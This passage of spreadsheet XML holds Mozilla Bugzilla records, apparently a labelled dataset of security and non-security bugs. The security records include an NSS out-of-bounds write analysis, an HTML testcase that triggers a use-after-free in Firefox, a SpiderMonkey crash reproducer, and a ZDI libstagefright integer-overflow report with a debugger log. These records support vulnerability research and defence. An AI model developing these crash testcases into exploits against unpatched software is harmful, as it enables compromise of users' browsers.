      <c r="Q2657" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2657" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2657" t="inlineStr">
        <is>
          <t>3.48</t>
        </is>
      </c>
      <c r="T2657" t="n">
        <v>1</v>
      </c>
      <c r="U2657" t="n">
        <v>0</v>
      </c>
      <c r="V2657" t="n">
        <v>36</v>
      </c>
      <c r="W2657" t="inlineStr">
        <is>
          <t>In `NSC_EncryptUpdate`, suppose that the `*pulEncryptedPartLen` parameter is smaller than the block size.
We assume the following path through the function:
```
...
if (crv != CKR_OK)  // false
...
if (!pEncryptedPart) {  // false
...
if (context-&gt;doPad) {  // true
    /* deal with previous buffered data */
    if (context-&gt;padDataLength != 0) {  // true
        /* fill in the padded to a full block size */
        for (...) {
            // this loop continues until context-&gt;padDataLength == context-&gt;blockSize
            // for this to happen, it's sufficient that ulPartLen &gt;= context-&gt;blockSize
            //   i.e., that there are at least context-&gt;blockSize bytes of input
            // or more precisely, this will happen when
            //   ulPartLen + context-&gt;padDataLength &gt;= context-&gt;blockSize
        }
        /* not enough data to encrypt yet? then return */
        if (context-&gt;padDataLength != context-&gt;blockSize) {  // false, due to above
          ...
        }
        /* encrypt the current padded data */
        rv = (*context-&gt;update)(context-&gt;cipherInfo, pEncryptedPart,
                                &amp;padoutlen, context-&gt;blockSize, context-&gt;padBuf,
                                context-&gt;blockSize);
```
In the call to `context-&gt;update`, the fourth parameter indicates the maximum length which can be written to the output buffer `pEncryptedPart`.  This parameter is set to be `context-&gt;blockSize`, even though only `*pulEncryptedPartLen` bytes remain in the output buffer, and we were assuming that `*pulEncryptedPartLen` was less than the block size.
There are two ramifications of this: first, we can have a small out-of-bounds write here.  The call to `context-&gt;update` can write up to about `context-&gt;blockSize` bytes off of the end of the output buffer.
Second, `context-&gt;update` will write to the variable `padoutlen` indicating the number of bytes written.  Supposing `context-&gt;update` does write the allowed maximum of `context-&gt;blockSize` bytes to the buffer, we will have `padoutlen == context-&gt;blockSize`.  Then:
```
pEncryptedPart += padoutlen;  // advancing the pEncryptedPart pointer beyond the end of the buffer
maxout -= padoutlen;
```
Since `maxout` was initialized to be `*pulEncryptedPartLen` and is thus smaller than the block size in this case, the subtraction will wrap around and give a very large positive value for `maxout` due to its unsigned type.
The subsequent use of `maxout` here:
```
/* do it: NOTE: this assumes buf size in is &gt;= buf size out! */
rv = (*context-&gt;update)(context-&gt;cipherInfo, pEncryptedPart,
                        &amp;outlen, maxout, pPart, ulPartLen);
```
will allow `context-&gt;update` to write up to `maxout` many bytes, that is, effectively arbitrarily many bytes to `pEncryptedPart`.  This is an out-of-bounds write arbitrarily far beyond the buffer.
I think the first call to `context-&gt;update` should pass `maxout` rather than `context-&gt;blockSize` as the fourth parameter, so that the maximum output length is `maxout` rather than `context-&gt;blockSize`.  I.e.,
```
        rv = (*context-&gt;update)(context-&gt;cipherInfo, pEncryptedPart,
-                               &amp;padoutlen, context-&gt;blockSize, context-&gt;padBuf,
+                               &amp;padoutlen, maxout, context-&gt;padBuf,
                                context-&gt;blockSize);
```
The related function `NSC_DecryptUpdate` already does this: it uses `maxout` for the maximum-output-length parameter to `context-&gt;update` every time it calls `context-&gt;update`.</t>
        </is>
      </c>
      <c r="X2657" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2658">
      <c r="A2658" t="n">
        <v>1317380</v>
      </c>
      <c r="B2658" t="inlineStr">
        <is>
          <t>2016-11-14 09:47:40 -0800</t>
        </is>
      </c>
      <c r="C2658" t="inlineStr">
        <is>
          <t>Touch ID prompt continuously requested on Logins screen</t>
        </is>
      </c>
      <c r="D2658" t="inlineStr">
        <is>
          <t>2016-12-05 01:32:47 -0800</t>
        </is>
      </c>
      <c r="E2658" t="n">
        <v>1</v>
      </c>
      <c r="F2658" t="n">
        <v>1</v>
      </c>
      <c r="G2658" t="n">
        <v>2</v>
      </c>
      <c r="H2658" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2658" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2658" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2658" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2658" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2658" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2658" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2658" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2658" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q2658" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2658" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2658" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2658" t="n">
        <v>1</v>
      </c>
      <c r="U2658" t="n">
        <v>0</v>
      </c>
      <c r="V2658" t="n">
        <v>9</v>
      </c>
      <c r="W2658" t="inlineStr">
        <is>
          <t>From a feedback email:
  I noticed you cannot view Logins with Touch ID.
  It throws you in a loop to continuously enter your Touch ID.
  &gt; Settings &gt; Privacy &gt; Touch ID &amp; Passcode &gt; Enable Passcode and Touch ID
  &gt; Tap Logins &gt; Enter Touch ID
  Touch ID is asked for again every two seconds until you back out of the screen.</t>
        </is>
      </c>
      <c r="X2658" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2659">
      <c r="A2659" t="n">
        <v>460882</v>
      </c>
      <c r="B2659" t="inlineStr">
        <is>
          <t>2008-10-20 17:31:08 -0700</t>
        </is>
      </c>
      <c r="C2659" t="inlineStr">
        <is>
          <t>setTimeout loses XPCNativeWrappers</t>
        </is>
      </c>
      <c r="D2659" t="inlineStr">
        <is>
          <t>2018-06-06 11:44:15 -0700</t>
        </is>
      </c>
      <c r="E2659" t="n">
        <v>1</v>
      </c>
      <c r="F2659" t="n">
        <v>1</v>
      </c>
      <c r="G2659" t="n">
        <v>3</v>
      </c>
      <c r="H2659" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2659" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2659" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2659" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2659" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2659" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2659" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2659" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2659" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2659" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2659" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2659" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T2659" t="n">
        <v>1</v>
      </c>
      <c r="U2659" t="n">
        <v>0</v>
      </c>
      <c r="V2659" t="n">
        <v>48</v>
      </c>
      <c r="W2659" t="inlineStr">
        <is>
          <t>I'm spinning this bug off of bug 459906. The problem is that session store has (basically) this set up:
aContent = XPCNativeWrapper(contentWindow);
aContent.setTimeout(function(){this.document.designMode}, 0);
The expectation is that 'this' will be an XPCNativeWrapper. However, it isn't because setTimeout goes through the JS timeout handler stuff, which calls into nsJSContext::CallEventHandler, which has no way of wrapping 'this'. We should provide an API in XPConnect to allow callers to wrap native objects like XPConnect was about to call into a function.</t>
        </is>
      </c>
      <c r="X2659" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2660">
      <c r="A2660" t="n">
        <v>1071577</v>
      </c>
      <c r="B2660" t="inlineStr">
        <is>
          <t>2014-09-23 06:22:22 -0700</t>
        </is>
      </c>
      <c r="C2660" t="inlineStr">
        <is>
          <t>Make pushlog ingestion more robust - round 1</t>
        </is>
      </c>
      <c r="D2660" t="inlineStr">
        <is>
          <t>2014-10-02 02:52:12 -0700</t>
        </is>
      </c>
      <c r="E2660" t="n">
        <v>1</v>
      </c>
      <c r="F2660" t="n">
        <v>1</v>
      </c>
      <c r="G2660" t="n">
        <v>7</v>
      </c>
      <c r="H2660" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2660" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2660" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K2660" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2660" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2660" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2660" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2660" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2660" t="inlineStr"/>
      <c r="Q2660" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2660" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2660" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2660" t="n">
        <v>1</v>
      </c>
      <c r="U2660" t="n">
        <v>0</v>
      </c>
      <c r="V2660" t="n">
        <v>9</v>
      </c>
      <c r="W2660" t="inlineStr">
        <is>
          <t>The below push shows on TBPL (with running jobs). Treeherder never picked it up.
https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?changeset=f41dc09ee34b
The push after (https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?changeset=a70c83745785) appears on both as normal.</t>
        </is>
      </c>
      <c r="X2660" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2661">
      <c r="A2661" t="n">
        <v>764176</v>
      </c>
      <c r="B2661" t="inlineStr">
        <is>
          <t>2012-06-12 14:58:02 -0700</t>
        </is>
      </c>
      <c r="C2661" t="inlineStr">
        <is>
          <t>Crash with gradient, hugeness, "-moz-appearance: statusbar"</t>
        </is>
      </c>
      <c r="D2661" t="inlineStr">
        <is>
          <t>2012-10-21 22:14:09 -0700</t>
        </is>
      </c>
      <c r="E2661" t="n">
        <v>1</v>
      </c>
      <c r="F2661" t="n">
        <v>1</v>
      </c>
      <c r="G2661" t="n">
        <v>3</v>
      </c>
      <c r="H2661" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2661" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2661" t="inlineStr">
        <is>
          <t>Widget: Cocoa</t>
        </is>
      </c>
      <c r="K2661" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2661" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2661" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2661" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2661" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2661" t="inlineStr">
        <is>
          <t>[advisory-tracking+] STR in comment #10, maybe OS X 10.7 only?</t>
        </is>
      </c>
      <c r="Q2661" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2661" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2661" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T2661" t="n">
        <v>1</v>
      </c>
      <c r="U2661" t="n">
        <v>0</v>
      </c>
      <c r="V2661" t="n">
        <v>46</v>
      </c>
      <c r="W2661" t="inlineStr">
        <is>
          <t>Created attachment 632425
testcase (crashes Firefox when loaded)</t>
        </is>
      </c>
      <c r="X2661" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2662">
      <c r="A2662" t="n">
        <v>915210</v>
      </c>
      <c r="B2662" t="inlineStr">
        <is>
          <t>2013-09-11 08:16:50 -0700</t>
        </is>
      </c>
      <c r="C2662" t="inlineStr">
        <is>
          <t>ASAN heap-use-after-free in nsIPresShell::GetPresContext() with canvas, onresize and mozTextStyle</t>
        </is>
      </c>
      <c r="D2662" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:42 -0800</t>
        </is>
      </c>
      <c r="E2662" t="n">
        <v>1</v>
      </c>
      <c r="F2662" t="n">
        <v>1</v>
      </c>
      <c r="G2662" t="n">
        <v>3</v>
      </c>
      <c r="H2662" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2662" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2662" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K2662" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2662" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2662" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2662" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2662" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2662" t="inlineStr">
        <is>
          <t>[asan][adv-main25+][adv-esr1710+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q2662" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2662" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2662" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T2662" t="n">
        <v>1</v>
      </c>
      <c r="U2662" t="n">
        <v>0</v>
      </c>
      <c r="V2662" t="n">
        <v>21</v>
      </c>
      <c r="W2662" t="inlineStr">
        <is>
          <t>The following testcase crashes the firefox ASAN build:
&lt;html&gt;
&lt;script&gt;
function start() {
o14=document.createElement('iframe');
o14.src="data:text/html,&lt;body id='e0'&gt;&lt;/body&gt;";
document.getElementById('s').appendChild(o14);
window.setTimeout('startrly()', 100);
}
function startrly() {
o101=o14.contentDocument.getElementById('e0');
o130=document.createElement('canvas');
o131=o130.getContext('2d');
o154=o130;
o101.appendChild(o154);
o14.contentWindow.onresize=cb_frameresize_25_1;
o14.width='1';
window.scroll(175,961);
o131.mozTextStyle;
}
function cb_frameresize_25_1() {
document.body.appendChild(document.getElementById("s"));
}
&lt;/script&gt;
&lt;body onload="start()"&gt;
&lt;div id="s"&gt;&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="X2662" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2663">
      <c r="A2663" t="n">
        <v>1462891</v>
      </c>
      <c r="B2663" t="inlineStr">
        <is>
          <t>2018-05-19 01:28:47 -0700</t>
        </is>
      </c>
      <c r="C2663" t="inlineStr">
        <is>
          <t>PerformanceNavigationTiming should reduce the time precision</t>
        </is>
      </c>
      <c r="D2663" t="inlineStr">
        <is>
          <t>2019-08-07 16:57:05 -0700</t>
        </is>
      </c>
      <c r="E2663" t="n">
        <v>1</v>
      </c>
      <c r="F2663" t="n">
        <v>1</v>
      </c>
      <c r="G2663" t="n">
        <v>3</v>
      </c>
      <c r="H2663" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2663" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2663" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2663" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L2663" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2663" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2663" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2663" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2663" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main61+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2663" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2663" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2663" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T2663" t="n">
        <v>1</v>
      </c>
      <c r="U2663" t="n">
        <v>0</v>
      </c>
      <c r="V2663" t="n">
        <v>19</v>
      </c>
      <c r="W2663" t="inlineStr">
        <is>
          <t>It doesn't seem that PerformanceNavigationTiming::{UnloadEventStart,UnloadEventEnd,DomInteractive,...} use nsRFPService::ReduceTimePrecisionAsMSecs.</t>
        </is>
      </c>
      <c r="X2663" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2664">
      <c r="A2664" t="n">
        <v>1572985</v>
      </c>
      <c r="B2664" t="inlineStr">
        <is>
          <t>2019-08-10 15:25:21 -0700</t>
        </is>
      </c>
      <c r="C2664" t="inlineStr">
        <is>
          <t>Self-hosted JavaScript assertion info: "js/src/builtin/intl/CommonFunctions.js:1821: locale after concatenation is a canonicalized language tag"</t>
        </is>
      </c>
      <c r="D2664" t="inlineStr">
        <is>
          <t>2022-01-10 05:15:06 -0800</t>
        </is>
      </c>
      <c r="E2664" t="n">
        <v>1</v>
      </c>
      <c r="F2664" t="n">
        <v>1</v>
      </c>
      <c r="G2664" t="n">
        <v>3</v>
      </c>
      <c r="H2664" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2664" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2664" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2664" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2664" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2664" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2664" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2664" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2664" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q2664" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2664" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2664" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T2664" t="n">
        <v>1</v>
      </c>
      <c r="U2664" t="n">
        <v>0</v>
      </c>
      <c r="V2664" t="n">
        <v>10</v>
      </c>
      <c r="W2664" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision a28a338396c3 (build with --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --ion-offthread-compile=off):
    new Intl.DateTimeFormat(["en-u-hc-h24-nu-arab"]).resolvedOptions()
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    intrinsic_AssertionFailed (cx=cx@entry=0x7ffff5f23000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/vm/SelfHosting.cpp:459
    #0  intrinsic_AssertionFailed (cx=cx@entry=0x7ffff5f23000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/vm/SelfHosting.cpp:459
    #1  0x00005555558ea03f in CallJSNative (cx=0x7ffff5f23000, native=native@entry=0x555555b658b0 &lt;intrinsic_AssertionFailed(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/vm/Interpreter.cpp:448
    [...]
    #5  0x000055555611eb93 in js::jit::DoCallFallback (cx=&lt;optimized out&gt;, frame=0x7fffffffc330, stub=0x7ffff47b0780, argc=1, vp=0x7fffffffc250, res=...) at js/src/jit/BaselineIC.cpp:3209
    #6  0x00000fbb16ef43e3 in ?? ()
    #7  0x0000000000000000 in ?? ()
    rax	0x555557cd7120	93825033662752
    rbx	0x7fffffffbc10	140737488337936
    rcx	0x555556bdd259	93825015861849
    rdx	0x0	0
    rsi	0x7ffff6eeb770	140737336227696
    rdi	0x7ffff6eea540	140737336223040
    rbp	0x7fffffffbc50	140737488338000
    rsp	0x7fffffffbbf0	140737488337904
    r8	0x7ffff6eeb770	140737336227696
    r9	0x7ffff7fe6cc0	140737354034368
    r10	0x58	88
    r11	0x7ffff6b927a0	140737332717472
    r12	0x1633eda08220	24412285862432
    r13	0x7ffff5f23000	140737319677952
    r14	0x7fffffffbc88	140737488338056
    r15	0x7ffff5f56000	140737319886848
    rip	0x555555b6590c &lt;intrinsic_AssertionFailed(JSContext*, unsigned int, JS::Value*)+92&gt;
    =&gt; 0x555555b6590c &lt;intrinsic_AssertionFailed(JSContext*, unsigned int, JS::Value*)+92&gt;:	movl   $0x0,0x0
       0x555555b65917 &lt;intrinsic_AssertionFailed(JSContext*, unsigned int, JS::Value*)+103&gt;:	ud2</t>
        </is>
      </c>
      <c r="X2664" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2665">
      <c r="A2665" t="n">
        <v>1442528</v>
      </c>
      <c r="B2665" t="inlineStr">
        <is>
          <t>2018-03-02 00:15:20 -0800</t>
        </is>
      </c>
      <c r="C2665" t="inlineStr">
        <is>
          <t>Keyboard handling in Google Docs is broken if "dom.keyboardevent.keypress.dispatch_non_printable_keys_only_system_group_in_content" is true</t>
        </is>
      </c>
      <c r="D2665" t="inlineStr">
        <is>
          <t>2019-02-15 06:28:27 -0800</t>
        </is>
      </c>
      <c r="E2665" t="n">
        <v>1</v>
      </c>
      <c r="F2665" t="n">
        <v>1</v>
      </c>
      <c r="G2665" t="n">
        <v>2</v>
      </c>
      <c r="H2665" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2665" t="inlineStr">
        <is>
          <t>Web Compatibility</t>
        </is>
      </c>
      <c r="J2665" t="inlineStr">
        <is>
          <t>Site Reports</t>
        </is>
      </c>
      <c r="K2665" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="L2665" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2665" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2665" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2665" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2665" t="inlineStr">
        <is>
          <t>[platform-rel-Google][platform-rel-GoogleSuite] Set dom.keyboardevent.keypress.dispatch_non_printable_keys_only_system_group_in_content to false to prevent this kind of bugs</t>
        </is>
      </c>
      <c r="Q2665" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2665" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2665" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2665" t="n">
        <v>1</v>
      </c>
      <c r="U2665" t="n">
        <v>1</v>
      </c>
      <c r="V2665" t="n">
        <v>33</v>
      </c>
      <c r="W2665" t="inlineStr">
        <is>
          <t>Backspace/Delete doesn't work any more.  Arrow keys don't work.  Shift+TAB doesn't work.  Looks like something is busted in our keyboard handling.
No obvious errors in the console.
Observed both on Linux and macOS with the Nightly that is most recent as of 0900 CET 2018-03-02.</t>
        </is>
      </c>
      <c r="X2665" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2666">
      <c r="A2666" t="n">
        <v>1185115</v>
      </c>
      <c r="B2666" t="inlineStr">
        <is>
          <t>2015-07-17 14:34:26 -0700</t>
        </is>
      </c>
      <c r="C2666" t="inlineStr">
        <is>
          <t>MPEG4 saio Chunk Integer Overflow (libstagefright) (ZDI-CAN-2966)</t>
        </is>
      </c>
      <c r="D2666" t="inlineStr">
        <is>
          <t>2016-07-02 10:53:51 -0700</t>
        </is>
      </c>
      <c r="E2666" t="n">
        <v>1</v>
      </c>
      <c r="F2666" t="n">
        <v>1</v>
      </c>
      <c r="G2666" t="n">
        <v>3</v>
      </c>
      <c r="H2666" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2666" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2666" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K2666" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2666" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2666" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N2666" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2666" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2666" t="inlineStr">
        <is>
          <t>[adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q2666" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2666" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2666" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T2666" t="n">
        <v>1</v>
      </c>
      <c r="U2666" t="n">
        <v>0</v>
      </c>
      <c r="V2666" t="n">
        <v>59</v>
      </c>
      <c r="W2666" t="inlineStr">
        <is>
          <t>Created attachment 8635536
PoC from ZDI (zip, no password)
The security alias received the following information from HP's Zero Day Initiative. According to their "upcoming" list they initially sent it to us on 2015-05-28 but we did not receive it. When I saw Mozilla on their upcoming list I asked them to resend and got this on 2015-07-13 (delayed filing due to travel). I have not yet confirmed this problem. We recently fixed several similar-sounding libstagefright issues so we'll need to first test on the old builds they claim are affected.
-- VULNERABILITY DETAILS ------------------------
Tested against Firefox 38.0.1 and the Nightly from 20150518 on Windows 8.1
There is an integer overflow within media/libstagefright/system/core/libutils/VectorImpl.cpp if the attacker can control the size:
```
ssize_t VectorImpl::setCapacity(size_t new_capacity)
{
    size_t current_capacity = capacity();
    ssize_t amount = new_capacity - size();
    if (amount &lt;= 0) {
        // we can't reduce the capacity
        return current_capacity;
    }
    SharedBuffer* sb = SharedBuffer::alloc(new_capacity * mItemSize);
    if (sb) {
        void* array = sb-&gt;data();
        _do_copy(array, mStorage, size());
        release_storage();
        mStorage = const_cast&lt;void*&gt;(array);
    } else {
        return NO_MEMORY;
    }
    return new_capacity;
}
```
There is a second integer overflow within media/libstagefright/system/core/libutils/SharedBuffer.cpp!SharedBuffer::alloc if the attacker can control the size:
```
SharedBuffer* SharedBuffer::alloc(size_t size)
{
    SharedBuffer* sb = static_cast&lt;SharedBuffer *&gt;(malloc(sizeof(SharedBuffer) + size));
    if (sb) {
        sb-&gt;mRefs = 1;
        sb-&gt;mSize = size;
    }
    return sb;
}
```
Both of these are reachable through the MPEG4 parser within media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.
Specifically, if a 'saio' chunk is seen while within parseChunk, execution continues to media/libstagefright/frameworks/av/media/libstagefright/SampleTable.cpp where the controlled value is read and used to allocate memory
Debug log:
```
(998.900): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=91919191 ebx=007af700 ecx=03a4c300 edx=00000001 esi=03a10a60 edi=03a10a70
eip=5e8784cf esp=007af504 ebp=03a4c300 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
xul!mozilla::ipc::MessagePump::Run+0x7b:
5e8784cf ff5008          call    dword ptr [eax+8]    ds:0023:91919199=????????
0:000&gt; kv
ChildEBP RetAddr  Args to Child               
007af524 5e87844e 03a4c300 92946523 03a40fd0 xul!mozilla::ipc::MessagePump::Run+0x7b (FPO: [1,4,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\glue\messagepump.cpp @ 117]
007af55c 5e878118 03a401d0 00000001 5e8a0200 xul!MessageLoop::RunHandler+0x20 (FPO: [SEH]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc @ 227]
007af57c 5e8788ec 0ac5e340 00000000 5e87951d xul!MessageLoop::Run+0x19 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc @ 201]
007af588 5e87951d 03a40fd0 0ac5e340 5e6b3162 xul!nsBaseAppShell::Run+0x32 (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\nsbaseappshell.cpp @ 166]
007af594 5e6b3162 03a40fd0 007af80d 0d0a4180 xul!nsAppShell::Run+0x1b (FPO: [1,0,4]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\widget\windows\nsappshell.cpp @ 178]
